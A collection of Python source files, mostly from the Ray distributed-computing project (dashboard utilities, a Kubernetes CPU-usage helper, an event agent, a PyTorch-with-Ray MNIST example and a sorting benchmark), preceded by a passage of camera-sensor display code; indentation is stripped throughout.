# We need to pass the lambda a weak reference to self to avoid
# circular reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))
if notify:
self._hud.notification(self._sensors[index][2])
self._index = index
def next_sensor(self):
self.set_sensor(self._index + 1)
def toggle_recording(self):
self._recording = not self._recording
self._hud.notification('Recording %s' % ('On' if self._recording else 'Off'))
def render(self, display):
if self._surface is not None:
display.blit(self._surface, (0, 0))
# display.blit(self._SupportSurfaceList[0],(480,100))
# display.blit(self._surface_1,(480,100))
display.blit(self._SupportSurfaceList[0],(10,490))
display.blit(self._SupportSurfaceList[1],(460,490))
display.blit(self._SupportSurfaceList[2],(910,490))
@staticmethod
def _parse_image(weak_self, image):
self = weak_self()
if not self:
return
if self._sensors[self._index][0].startswith('sensor.lidar'):
points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))
points = np.reshape(points, (int(points.shape[0]/3), 3))
lidar_data = np.array(points[:, :2])
lidar_data *= min(self._hud.dim) / 100.0
lidar_data += (0.5 * self._hud.dim[0], 0.5 * self._hud.dim[1])
lidar_data = np.fabs(lidar_data)
lidar_data = lidar_data.astype(np.int32)
lidar_data = np.reshape(lidar_data, (-1, 2))
lidar_img_size = (self._hud.dim[0], self._hud.dim[1], 3)
lidar_img = np.zeros(lidar_img_size)
lidar_img[tuple(lidar_data.T)] = (255, 255, 255)
self._surface = pygame.surfarray.make_surface(lidar_img)
else:
image.convert(self._sensors[self._index][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera1_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[5][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[0] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera2_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[0][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[1] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera3_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[3][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[2] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
``` |
{
"source": "77loopin/ray",
"score": 3
} |
#### File: ray/dashboard/k8s_utils.py
```python
import logging
import ray._private.utils
logger = logging.getLogger(__name__)
CPU_SHARES_PATH = "/sys/fs/cgroup/cpu/cpu.shares"
CPU_USAGE_PATH = "/sys/fs/cgroup/cpuacct/cpuacct.usage"
PROC_STAT_PATH = "/proc/stat"
container_num_cpus = None
host_num_cpus = None
last_cpu_usage = None
last_system_usage = None
def cpu_percent():
"""Estimate CPU usage percent for Ray pod managed by Kubernetes
Operator.
Computed by the following steps
(1) Replicate the logic used by 'docker stats' cli command.
See https://github.com/docker/cli/blob/c0a6b1c7b30203fbc28cd619acb901a95a80e30e/cli/command/container/stats_helpers.go#L166.
(2) Divide by the number of CPUs available to the container, so that
e.g. full capacity use of 2 CPUs will read as 100%,
rather than 200%.
Step (1) above works by
dividing delta in cgroup's cpuacct.usage by
delta in total host cpu usage, averaged over host's cpus.
Since deltas are not initially available, return 0.0 on first call.
""" # noqa
global last_system_usage
global last_cpu_usage
try:
cpu_usage = _cpu_usage()
system_usage = _system_usage()
# Return 0.0 on first call.
if last_system_usage is None:
cpu_percent = 0.0
else:
cpu_delta = cpu_usage - last_cpu_usage
# "System time passed." (Typically close to clock time.)
system_delta = (
(system_usage - last_system_usage) / _host_num_cpus())
quotient = cpu_delta / system_delta
cpu_percent = round(
quotient * 100 / ray._private.utils.get_k8s_cpus(), 1)
last_system_usage = system_usage
last_cpu_usage = cpu_usage
# Computed percentage might be slightly above 100%.
return min(cpu_percent, 100.0)
except Exception as e:
logger.exception("Error computing CPU usage of Ray Kubernetes pod.", e)
return 0.0
def _cpu_usage():
"""Compute total cpu usage of the container in nanoseconds
by reading from cgroup/cpuacct."""
return int(open(CPU_USAGE_PATH).read())
def _system_usage():
"""
Computes total CPU usage of the host in nanoseconds.
Logic taken from here:
https://github.com/moby/moby/blob/b42ac8d370a8ef8ec720dff0ca9dfb3530ac0a6a/daemon/stats/collector_unix.go#L31
See also the /proc/stat entry here:
https://man7.org/linux/man-pages/man5/proc.5.html
""" # noqa
cpu_summary_str = open(PROC_STAT_PATH).read().split("\n")[0]
parts = cpu_summary_str.split()
assert parts[0] == "cpu"
usage_data = parts[1:8]
total_clock_ticks = sum(int(entry) for entry in usage_data)
# 100 clock ticks per second, 10^9 ns per second
usage_ns = total_clock_ticks * 10**7
return usage_ns
def _host_num_cpus():
"""Number of physical CPUs, obtained by parsing /proc/stat."""
global host_num_cpus
if host_num_cpus is None:
proc_stat_lines = open(PROC_STAT_PATH).read().split("\n")
split_proc_stat_lines = [line.split() for line in proc_stat_lines]
cpu_lines = [
split_line for split_line in split_proc_stat_lines
if len(split_line) > 0 and "cpu" in split_line[0]
]
# Number of lines starting with a word including 'cpu', subtracting
# 1 for the first summary line.
host_num_cpus = len(cpu_lines) - 1
return host_num_cpus
```
#### File: modules/event/event_agent.py
```python
import os
import asyncio
import logging
from typing import Union
from grpc.experimental import aio as aiogrpc
import ray.new_dashboard.utils as dashboard_utils
import ray.new_dashboard.consts as dashboard_consts
from ray.ray_constants import env_bool
from ray.new_dashboard.utils import async_loop_forever, create_task
from ray.new_dashboard.modules.event import event_consts
from ray.new_dashboard.modules.event.event_utils import monitor_events
from ray.core.generated import event_pb2
from ray.core.generated import event_pb2_grpc
logger = logging.getLogger(__name__)
routes = dashboard_utils.ClassMethodRouteTable
@dashboard_utils.dashboard_module(
enable=env_bool(event_consts.EVENT_MODULE_ENVIRONMENT_KEY, False))
class EventAgent(dashboard_utils.DashboardAgentModule):
def __init__(self, dashboard_agent):
super().__init__(dashboard_agent)
self._event_dir = os.path.join(self._dashboard_agent.log_dir, "events")
os.makedirs(self._event_dir, exist_ok=True)
self._monitor: Union[asyncio.Task, None] = None
self._stub: Union[event_pb2_grpc.ReportEventServiceStub, None] = None
self._cached_events = asyncio.Queue(
event_consts.EVENT_AGENT_CACHE_SIZE)
logger.info("Event agent cache buffer size: %s",
self._cached_events.maxsize)
async def _connect_to_dashboard(self):
""" Connect to the dashboard. If the dashboard is not started, then
this method will never returns.
Returns:
The ReportEventServiceStub object.
"""
while True:
try:
aioredis = self._dashboard_agent.aioredis_client
dashboard_rpc_address = await aioredis.get(
dashboard_consts.REDIS_KEY_DASHBOARD_RPC)
if dashboard_rpc_address:
logger.info("Report events to %s", dashboard_rpc_address)
options = (("grpc.enable_http_proxy", 0), )
channel = aiogrpc.insecure_channel(
dashboard_rpc_address, options=options)
return event_pb2_grpc.ReportEventServiceStub(channel)
except Exception:
logger.exception("Connect to dashboard failed.")
await asyncio.sleep(
event_consts.RETRY_CONNECT_TO_DASHBOARD_INTERVAL_SECONDS)
@async_loop_forever(event_consts.EVENT_AGENT_REPORT_INTERVAL_SECONDS)
async def report_events(self):
""" Report events from cached events queue. Reconnect to dashboard if
report failed. Log error after retry EVENT_AGENT_RETRY_TIMES.
This method will never returns.
"""
data = await self._cached_events.get()
for _ in range(event_consts.EVENT_AGENT_RETRY_TIMES):
try:
logger.info("Report %s events.", len(data))
request = event_pb2.ReportEventsRequest(event_strings=data)
await self._stub.ReportEvents(request)
break
except Exception:
logger.exception("Report event failed, reconnect to the "
"dashboard.")
self._stub = await self._connect_to_dashboard()
else:
data_str = str(data)
limit = event_consts.LOG_ERROR_EVENT_STRING_LENGTH_LIMIT
logger.error("Report event failed: %s",
data_str[:limit] + (data_str[limit:] and "..."))
async def run(self, server):
# Connect to dashboard.
self._stub = await self._connect_to_dashboard()
# Start monitor task.
self._monitor = monitor_events(
self._event_dir,
lambda data: create_task(self._cached_events.put(data)),
source_types=event_consts.EVENT_AGENT_MONITOR_SOURCE_TYPES)
# Start reporting events.
await self.report_events()
```
#### File: ray/dashboard/utils.py
```python
import abc
import asyncio
import collections
import datetime
import functools
import importlib
import inspect
import json
import logging
import os
import pkgutil
import socket
import traceback
from abc import ABCMeta, abstractmethod
from base64 import b64decode
from collections import namedtuple
from collections.abc import MutableMapping, Mapping, Sequence
from typing import Any
import aiohttp.signals
import aiohttp.web
import aioredis
import time
from aiohttp import hdrs
from aiohttp.frozenlist import FrozenList
from aiohttp.typedefs import PathLike
from aiohttp.web import RouteDef
from google.protobuf.json_format import MessageToDict
import ray.new_dashboard.consts as dashboard_consts
from ray.ray_constants import env_bool
from ray._private.utils import binary_to_hex
try:
create_task = asyncio.create_task
except AttributeError:
create_task = asyncio.ensure_future
logger = logging.getLogger(__name__)
class DashboardAgentModule(abc.ABC):
def __init__(self, dashboard_agent):
"""
Initialize current module when DashboardAgent loading modules.
:param dashboard_agent: The DashboardAgent instance.
"""
self._dashboard_agent = dashboard_agent
@abc.abstractmethod
async def run(self, server):
"""
Run the module in an asyncio loop. An agent module can provide
servicers to the server.
:param server: Asyncio GRPC server.
"""
class DashboardHeadModule(abc.ABC):
def __init__(self, dashboard_head):
"""
Initialize current module when DashboardHead loading modules.
:param dashboard_head: The DashboardHead instance.
"""
self._dashboard_head = dashboard_head
@abc.abstractmethod
async def run(self, server):
"""
Run the module in an asyncio loop. A head module can provide
servicers to the server.
:param server: Asyncio GRPC server.
"""
class ClassMethodRouteTable:
"""A helper class to bind http route to class method."""
_bind_map = collections.defaultdict(dict)
_routes = aiohttp.web.RouteTableDef()
class _BindInfo:
def __init__(self, filename, lineno, instance):
self.filename = filename
self.lineno = lineno
self.instance = instance
@classmethod
def routes(cls):
return cls._routes
@classmethod
def bound_routes(cls):
bound_items = []
for r in cls._routes._items:
if isinstance(r, RouteDef):
route_method = getattr(r.handler, "__route_method__")
route_path = getattr(r.handler, "__route_path__")
instance = cls._bind_map[route_method][route_path].instance
if instance is not None:
bound_items.append(r)
else:
bound_items.append(r)
routes = aiohttp.web.RouteTableDef()
routes._items = bound_items
return routes
@classmethod
def _register_route(cls, method, path, **kwargs):
def _wrapper(handler):
if path in cls._bind_map[method]:
bind_info = cls._bind_map[method][path]
raise Exception(f"Duplicated route path: {path}, "
f"previous one registered at "
f"{bind_info.filename}:{bind_info.lineno}")
bind_info = cls._BindInfo(handler.__code__.co_filename,
handler.__code__.co_firstlineno, None)
@functools.wraps(handler)
async def _handler_route(*args) -> aiohttp.web.Response:
try:
# Make the route handler as a bound method.
# The args may be:
# * (Request, )
# * (self, Request)
req = args[-1]
return await handler(bind_info.instance, req)
except Exception:
logger.exception("Handle %s %s failed.", method, path)
return rest_response(
success=False, message=traceback.format_exc())
cls._bind_map[method][path] = bind_info
_handler_route.__route_method__ = method
_handler_route.__route_path__ = path
return cls._routes.route(method, path, **kwargs)(_handler_route)
return _wrapper
@classmethod
def head(cls, path, **kwargs):
return cls._register_route(hdrs.METH_HEAD, path, **kwargs)
@classmethod
def get(cls, path, **kwargs):
return cls._register_route(hdrs.METH_GET, path, **kwargs)
@classmethod
def post(cls, path, **kwargs):
return cls._register_route(hdrs.METH_POST, path, **kwargs)
@classmethod
def put(cls, path, **kwargs):
return cls._register_route(hdrs.METH_PUT, path, **kwargs)
@classmethod
def patch(cls, path, **kwargs):
return cls._register_route(hdrs.METH_PATCH, path, **kwargs)
@classmethod
def delete(cls, path, **kwargs):
return cls._register_route(hdrs.METH_DELETE, path, **kwargs)
@classmethod
def view(cls, path, **kwargs):
return cls._register_route(hdrs.METH_ANY, path, **kwargs)
@classmethod
def static(cls, prefix: str, path: PathLike, **kwargs: Any) -> None:
cls._routes.static(prefix, path, **kwargs)
@classmethod
def bind(cls, instance):
def predicate(o):
if inspect.ismethod(o):
return hasattr(o, "__route_method__") and hasattr(
o, "__route_path__")
return False
handler_routes = inspect.getmembers(instance, predicate)
for _, h in handler_routes:
cls._bind_map[h.__func__.__route_method__][
h.__func__.__route_path__].instance = instance
def dashboard_module(enable):
"""A decorator for dashboard module."""
def _cls_wrapper(cls):
cls.__ray_dashboard_module_enable__ = enable
return cls
return _cls_wrapper
def get_all_modules(module_type):
logger.info(f"Get all modules by type: {module_type.__name__}")
import ray.new_dashboard.modules
for module_loader, name, ispkg in pkgutil.walk_packages(
ray.new_dashboard.modules.__path__,
ray.new_dashboard.modules.__name__ + "."):
importlib.import_module(name)
return [
m for m in module_type.__subclasses__()
if getattr(m, "__ray_dashboard_module_enable__", True)
]
def to_posix_time(dt):
return (dt - datetime.datetime(1970, 1, 1)).total_seconds()
def address_tuple(address):
if isinstance(address, tuple):
return address
ip, port = address.split(":")
return ip, int(port)
class CustomEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, bytes):
return binary_to_hex(obj)
if isinstance(obj, Immutable):
return obj.mutable()
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
def rest_response(success, message, **kwargs) -> aiohttp.web.Response:
# In the dev context we allow a dev server running on a
# different port to consume the API, meaning we need to allow
# cross-origin access
if os.environ.get("RAY_DASHBOARD_DEV") == "1":
headers = {"Access-Control-Allow-Origin": "*"}
else:
headers = {}
return aiohttp.web.json_response(
{
"result": success,
"msg": message,
"data": to_google_style(kwargs)
},
dumps=functools.partial(json.dumps, cls=CustomEncoder),
headers=headers)
def to_camel_case(snake_str):
"""Convert a snake str to camel case."""
components = snake_str.split("_")
# We capitalize the first letter of each component except the first one
# with the 'title' method and join them together.
return components[0] + "".join(x.title() for x in components[1:])
def to_google_style(d):
"""Recursive convert all keys in dict to google style."""
new_dict = {}
for k, v in d.items():
if isinstance(v, dict):
new_dict[to_camel_case(k)] = to_google_style(v)
elif isinstance(v, list):
new_list = []
for i in v:
if isinstance(i, dict):
new_list.append(to_google_style(i))
else:
new_list.append(i)
new_dict[to_camel_case(k)] = new_list
else:
new_dict[to_camel_case(k)] = v
return new_dict
def message_to_dict(message, decode_keys=None, **kwargs):
"""Convert protobuf message to Python dict."""
def _decode_keys(d):
for k, v in d.items():
if isinstance(v, dict):
d[k] = _decode_keys(v)
if isinstance(v, list):
new_list = []
for i in v:
if isinstance(i, dict):
new_list.append(_decode_keys(i))
else:
new_list.append(i)
d[k] = new_list
else:
if k in decode_keys:
d[k] = binary_to_hex(b64decode(v))
else:
d[k] = v
return d
if decode_keys:
return _decode_keys(
MessageToDict(message, use_integers_for_enums=False, **kwargs))
else:
return MessageToDict(message, use_integers_for_enums=False, **kwargs)
# The cache value type used by aiohttp_cache.
_AiohttpCacheValue = namedtuple("AiohttpCacheValue",
["data", "expiration", "task"])
# The methods with no request body used by aiohttp_cache.
_AIOHTTP_CACHE_NOBODY_METHODS = {hdrs.METH_GET, hdrs.METH_DELETE}
def aiohttp_cache(
ttl_seconds=dashboard_consts.AIOHTTP_CACHE_TTL_SECONDS,
maxsize=dashboard_consts.AIOHTTP_CACHE_MAX_SIZE,
enable=not env_bool(
dashboard_consts.AIOHTTP_CACHE_DISABLE_ENVIRONMENT_KEY, False)):
assert maxsize > 0
cache = collections.OrderedDict()
def _wrapper(handler):
if enable:
@functools.wraps(handler)
async def _cache_handler(*args) -> aiohttp.web.Response:
# Make the route handler as a bound method.
# The args may be:
# * (Request, )
# * (self, Request)
req = args[-1]
# Make key.
if req.method in _AIOHTTP_CACHE_NOBODY_METHODS:
key = req.path_qs
else:
key = (req.path_qs, await req.read())
# Query cache.
value = cache.get(key)
if value is not None:
cache.move_to_end(key)
if (not value.task.done()
or value.expiration >= time.time()):
# Update task not done or the data is not expired.
return aiohttp.web.Response(**value.data)
def _update_cache(task):
try:
response = task.result()
except Exception:
response = rest_response(
success=False, message=traceback.format_exc())
data = {
"status": response.status,
"headers": dict(response.headers),
"body": response.body,
}
cache[key] = _AiohttpCacheValue(data,
time.time() + ttl_seconds,
task)
cache.move_to_end(key)
if len(cache) > maxsize:
cache.popitem(last=False)
return response
task = create_task(handler(*args))
task.add_done_callback(_update_cache)
if value is None:
return await task
else:
return aiohttp.web.Response(**value.data)
suffix = f"[cache ttl={ttl_seconds}, max_size={maxsize}]"
_cache_handler.__name__ += suffix
_cache_handler.__qualname__ += suffix
return _cache_handler
else:
return handler
if inspect.iscoroutinefunction(ttl_seconds):
target_func = ttl_seconds
ttl_seconds = dashboard_consts.AIOHTTP_CACHE_TTL_SECONDS
return _wrapper(target_func)
else:
return _wrapper
class SignalManager:
_signals = FrozenList()
@classmethod
def register(cls, sig):
cls._signals.append(sig)
@classmethod
def freeze(cls):
cls._signals.freeze()
for sig in cls._signals:
sig.freeze()
class Signal(aiohttp.signals.Signal):
__slots__ = ()
def __init__(self, owner):
super().__init__(owner)
SignalManager.register(self)
class Bunch(dict):
"""A dict with attribute-access."""
def __getattr__(self, key):
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError(key)
def __setattr__(self, key, value):
self.__setitem__(key, value)
class Change:
"""Notify change object."""
def __init__(self, owner=None, old=None, new=None):
self.owner = owner
self.old = old
self.new = new
def __str__(self):
return f"Change(owner: {type(self.owner)}), " \
f"old: {self.old}, new: {self.new}"
class NotifyQueue:
"""Asyncio notify queue for Dict signal."""
_queue = asyncio.Queue()
@classmethod
def put(cls, co):
cls._queue.put_nowait(co)
@classmethod
async def get(cls):
return await cls._queue.get()
"""
https://docs.python.org/3/library/json.html?highlight=json#json.JSONEncoder
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str | string |
+-------------------+---------------+
| int, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
"""
_json_compatible_types = {
dict, list, tuple, str, int, float, bool,
type(None), bytes
}
def is_immutable(self):
raise TypeError("%r objects are immutable" % self.__class__.__name__)
def make_immutable(value, strict=True):
value_type = type(value)
if value_type is dict:
return ImmutableDict(value)
if value_type is list:
return ImmutableList(value)
if strict:
if value_type not in _json_compatible_types:
raise TypeError("Type {} can't be immutable.".format(value_type))
return value
class Immutable(metaclass=ABCMeta):
@abstractmethod
def mutable(self):
pass
class ImmutableList(Immutable, Sequence):
"""Makes a :class:`list` immutable.
"""
__slots__ = ("_list", "_proxy")
def __init__(self, list_value):
if type(list_value) not in (list, ImmutableList):
raise TypeError(f"{type(list_value)} object is not a list.")
if isinstance(list_value, ImmutableList):
list_value = list_value.mutable()
self._list = list_value
self._proxy = [None] * len(list_value)
def __reduce_ex__(self, protocol):
return type(self), (self._list, )
def mutable(self):
return self._list
def __eq__(self, other):
if isinstance(other, ImmutableList):
other = other.mutable()
return list.__eq__(self._list, other)
def __ne__(self, other):
if isinstance(other, ImmutableList):
other = other.mutable()
return list.__ne__(self._list, other)
def __contains__(self, item):
if isinstance(item, Immutable):
item = item.mutable()
return list.__contains__(self._list, item)
def __getitem__(self, item):
proxy = self._proxy[item]
if proxy is None:
proxy = self._proxy[item] = make_immutable(self._list[item])
return proxy
def __len__(self):
return len(self._list)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, list.__repr__(self._list))
class ImmutableDict(Immutable, Mapping):
"""Makes a :class:`dict` immutable.
"""
__slots__ = ("_dict", "_proxy")
def __init__(self, dict_value):
if type(dict_value) not in (dict, ImmutableDict):
raise TypeError(f"{type(dict_value)} object is not a dict.")
if isinstance(dict_value, ImmutableDict):
dict_value = dict_value.mutable()
self._dict = dict_value
self._proxy = {}
def __reduce_ex__(self, protocol):
return type(self), (self._dict, )
def mutable(self):
return self._dict
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return make_immutable(default)
def __eq__(self, other):
if isinstance(other, ImmutableDict):
other = other.mutable()
return dict.__eq__(self._dict, other)
def __ne__(self, other):
if isinstance(other, ImmutableDict):
other = other.mutable()
return dict.__ne__(self._dict, other)
def __contains__(self, item):
if isinstance(item, Immutable):
item = item.mutable()
return dict.__contains__(self._dict, item)
def __getitem__(self, item):
proxy = self._proxy.get(item, None)
if proxy is None:
proxy = self._proxy[item] = make_immutable(self._dict[item])
return proxy
def __len__(self) -> int:
return len(self._dict)
def __iter__(self):
if len(self._proxy) != len(self._dict):
for key in self._dict.keys() - self._proxy.keys():
self._proxy[key] = make_immutable(self._dict[key])
return iter(self._proxy)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, dict.__repr__(self._dict))
class Dict(ImmutableDict, MutableMapping):
"""A simple descriptor for dict type to notify data changes.
:note: Only the first level data report change.
"""
ChangeItem = namedtuple("DictChangeItem", ["key", "value"])
def __init__(self, *args, **kwargs):
super().__init__(dict(*args, **kwargs))
self.signal = Signal(self)
def __setitem__(self, key, value):
old = self._dict.pop(key, None)
self._proxy.pop(key, None)
self._dict[key] = value
if len(self.signal) and old != value:
if old is None:
co = self.signal.send(
Change(owner=self, new=Dict.ChangeItem(key, value)))
else:
co = self.signal.send(
Change(
owner=self,
old=Dict.ChangeItem(key, old),
new=Dict.ChangeItem(key, value)))
NotifyQueue.put(co)
def __delitem__(self, key):
old = self._dict.pop(key, None)
self._proxy.pop(key, None)
if len(self.signal) and old is not None:
co = self.signal.send(
Change(owner=self, old=Dict.ChangeItem(key, old)))
NotifyQueue.put(co)
def reset(self, d):
assert isinstance(d, Mapping)
for key in self._dict.keys() - d.keys():
del self[key]
for key, value in d.items():
self[key] = value
# Register immutable types.
for immutable_type in Immutable.__subclasses__():
_json_compatible_types.add(immutable_type)
async def get_aioredis_client(redis_address, redis_password,
retry_interval_seconds, retry_times):
for x in range(retry_times):
try:
return await aioredis.create_redis_pool(
address=redis_address, password=redis_password)
except (socket.gaierror, ConnectionError) as ex:
logger.error("Connect to Redis failed: %s, retry...", ex)
await asyncio.sleep(retry_interval_seconds)
# Raise exception from create_redis_pool
return await aioredis.create_redis_pool(
address=redis_address, password=redis_password)
def async_loop_forever(interval_seconds, cancellable=False):
def _wrapper(coro):
@functools.wraps(coro)
async def _looper(*args, **kwargs):
while True:
try:
await coro(*args, **kwargs)
except asyncio.CancelledError as ex:
if cancellable:
logger.info(f"An async loop forever coroutine "
f"is cancelled {coro}.")
raise ex
else:
logger.exception(f"Can not cancel the async loop "
f"forever coroutine {coro}.")
except Exception:
logger.exception(f"Error looping coroutine {coro}.")
await asyncio.sleep(interval_seconds)
return _looper
return _wrapper
```
#### File: examples/doc_code/torch_example.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.conv1 = nn.Conv2d(1, 20, 5, 1)
self.conv2 = nn.Conv2d(20, 50, 5, 1)
self.fc1 = nn.Linear(4 * 4 * 50, 500)
self.fc2 = nn.Linear(500, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2, 2)
x = x.view(-1, 4 * 4 * 50)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.log_softmax(x, dim=1)
# __torch_model_end__
# yapf: enable
# yapf: disable
# __torch_helper_start__
from filelock import FileLock
from torchvision import datasets, transforms
def train(model, device, train_loader, optimizer):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
# This break is for speeding up the tutorial.
if batch_idx * len(data) > 1024:
return
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
# sum up batch loss
test_loss += F.nll_loss(
output, target, reduction="sum").item()
pred = output.argmax(
dim=1,
keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
return {
"loss": test_loss,
"accuracy": 100. * correct / len(test_loader.dataset)
}
def dataset_creator(use_cuda):
kwargs = {"num_workers": 1, "pin_memory": True} if use_cuda else {}
with FileLock("./data.lock"):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=True,
download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])),
batch_size=128,
shuffle=True,
**kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])),
batch_size=128,
shuffle=True,
**kwargs)
return train_loader, test_loader
# __torch_helper_end__
# yapf: enable
# yapf: disable
# __torch_net_start__
import torch.optim as optim
class Network(object):
def __init__(self, lr=0.01, momentum=0.5):
use_cuda = torch.cuda.is_available()
self.device = device = torch.device("cuda" if use_cuda else "cpu")
self.train_loader, self.test_loader = dataset_creator(use_cuda)
self.model = Model().to(device)
self.optimizer = optim.SGD(
self.model.parameters(), lr=lr, momentum=momentum)
def train(self):
train(self.model, self.device, self.train_loader, self.optimizer)
return test(self.model, self.device, self.test_loader)
def get_weights(self):
return self.model.state_dict()
def set_weights(self, weights):
self.model.load_state_dict(weights)
def save(self):
torch.save(self.model.state_dict(), "mnist_cnn.pt")
net = Network()
net.train()
# __torch_net_end__
# yapf: enable
# yapf: disable
# __torch_ray_start__
import ray
ray.init()
RemoteNetwork = ray.remote(Network)
# Use the below instead of `ray.remote(network)` to leverage the GPU.
# RemoteNetwork = ray.remote(num_gpus=1)(Network)
# __torch_ray_end__
# yapf: enable
# yapf: disable
# __torch_actor_start__
NetworkActor = RemoteNetwork.remote()
NetworkActor2 = RemoteNetwork.remote()
ray.get([NetworkActor.train.remote(), NetworkActor2.train.remote()])
# __torch_actor_end__
# yapf: enable
# yapf: disable
# __weight_average_start__
weights = ray.get(
[NetworkActor.get_weights.remote(),
NetworkActor2.get_weights.remote()])
from collections import OrderedDict
averaged_weights = OrderedDict(
[(k, (weights[0][k] + weights[1][k]) / 2) for k in weights[0]])
weight_id = ray.put(averaged_weights)
[
actor.set_weights.remote(weight_id)
for actor in [NetworkActor, NetworkActor2]
]
ray.get([actor.train.remote() for actor in [NetworkActor, NetworkActor2]])
```
#### File: data/datasource/numpy_datasource.py
```python
from io import BytesIO
from typing import TYPE_CHECKING
import numpy as np
if TYPE_CHECKING:
import pyarrow
from ray.data.datasource.file_based_datasource import (FileBasedDatasource)
class NumpyDatasource(FileBasedDatasource):
"""Numpy datasource, for reading and writing Numpy files.
Examples:
>>> source = NumpyDatasource()
>>> ray.data.read_datasource(source, paths="/path/to/dir").take()
... [array([0., 1., 2.]), ...]
"""
def _read_file(self, f: "pyarrow.NativeFile", path: str, **reader_args):
# TODO(ekl) Ideally numpy can read directly from the file, but it
# seems like it requires the file to be seekable.
buf = BytesIO()
data = f.readall()
buf.write(data)
buf.seek(0)
return np.load(buf)
```
#### File: data/examples/demo_infer.py
```python
import ray
import time
ray.init(num_gpus=2)
ds = ray.data.range(100)
def preprocess(x):
import time
time.sleep(.1)
return x
class Model:
def __call__(self, x):
time.sleep(.1)
return x
ds = ds.pipeline(parallelism=10) \
.map(preprocess) \
.map(Model, compute="actors", num_gpus=1)
for x in ds.iter_rows():
pass
```
#### File: experimental/raysort/main.py
```python
import argparse
import csv
import logging
import os
import random
import subprocess
from typing import Iterable, List
import numpy as np
import ray
from ray.experimental.raysort import constants
from ray.experimental.raysort import logging_utils
from ray.experimental.raysort import sortlib
from ray.experimental.raysort import tracing_utils
from ray.experimental.raysort.types import BlockInfo, ByteCount, RecordCount, PartId, PartitionInfo, Path # noqa: E501
# ------------------------------------------------------------
# Parse Arguments
# ------------------------------------------------------------
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--ray_address",
default="auto",
type=str,
help="if set to None, will launch a local Ray cluster",
)
parser.add_argument(
"--total_data_size",
default=1_000_000_000,
type=ByteCount,
help="partition size in bytes",
)
parser.add_argument(
"--num_mappers",
default=4,
type=int,
help="number of map tasks",
)
parser.add_argument(
"--num_reducers",
default=4,
type=int,
help="number of reduce tasks",
)
parser.add_argument(
"--reducer_batch_num_records",
default=1_000_000,
type=RecordCount,
help="number of bytes to buffer before writing the output to EBS",
)
parser.add_argument(
"--skip_sorting",
default=False,
action="store_true",
help="if set, no sorting is actually performed",
)
parser.add_argument(
"--skip_input",
default=False,
action="store_true",
help="if set, mappers will not read data from disk",
)
parser.add_argument(
"--skip_output",
default=False,
action="store_true",
help="if set, reducers will not write out results to disk",
)
# Which tasks to run?
tasks_group = parser.add_argument_group(
"tasks to run", "if no task is specified, will run all tasks")
tasks = ["generate_input", "sort", "validate_output"]
for task in tasks:
tasks_group.add_argument(
f"--{task}", action="store_true", help=f"run task {task}")
args = parser.parse_args()
# Derive additional arguments.
args.input_part_size = ByteCount(args.total_data_size / args.num_mappers)
args.output_part_size = ByteCount(args.total_data_size / args.num_reducers)
args.mount_points = _get_mount_points()
# If no tasks are specified, run all tasks.
args_dict = vars(args)
if not any(args_dict[task] for task in tasks):
for task in tasks:
args_dict[task] = True
return args
def _get_mount_points():
mnt = "/mnt"
if not os.path.exists(mnt):
return []
return [os.path.join(mnt, d) for d in os.listdir(mnt)]
args = None
# ------------------------------------------------------------
